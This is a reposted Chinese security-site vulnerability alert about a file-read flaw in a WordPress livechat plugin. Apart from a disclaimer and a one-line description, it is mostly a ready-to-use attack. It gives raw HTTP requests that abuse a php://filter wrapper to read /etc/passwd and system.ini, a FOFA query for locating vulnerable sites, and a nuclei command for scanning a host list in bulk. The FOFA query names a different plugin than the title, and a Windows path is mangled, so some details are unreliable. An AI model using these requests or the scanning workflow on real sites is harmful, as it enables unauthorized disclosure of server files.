漏洞预警 WordPress plugin livechat 插件 文件读取漏洞

admin 2024年6月11日14:34:11评论5 views字数 697阅读2分19秒阅读模式

0x01 阅读须知

云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

WordPress plugin livechat 插件 存在文件读取漏洞。

漏洞预警 WordPress plugin livechat 插件 文件读取漏洞

0x03 漏洞复现

fofa-qeury: body="wp-content/plugins/Membership" 

1.执行poc进行/etc/passwd查询,得到base64编码,解码得到结果

  - |                      GET /?path=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1        Host:         User-Agent: Mozilla/5.0      - |                      GET /?path=php://filter/convert.base64-encode/resource=C:Windowssystem.ini HTTP/1.1        Host:         User-Agent: Mozilla/5.0  

漏洞预警 WordPress plugin livechat 插件 文件读取漏洞

2.nuclei验证脚本已发布于知识星球

nuclei.exe -t wordpress-plugin-livechat-fileread.yaml -l subs.txt -stats

漏洞预警 WordPress plugin livechat 插件 文件读取漏洞

   

原文始发于微信公众号(融云攻防实验室):漏洞预警 WordPress plugin livechat 插件 文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月11日14:34:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞预警 WordPress plugin livechat 插件 文件读取漏洞https://cn-sec.com/archives/2836528.html

发表评论

匿名网友 填写信息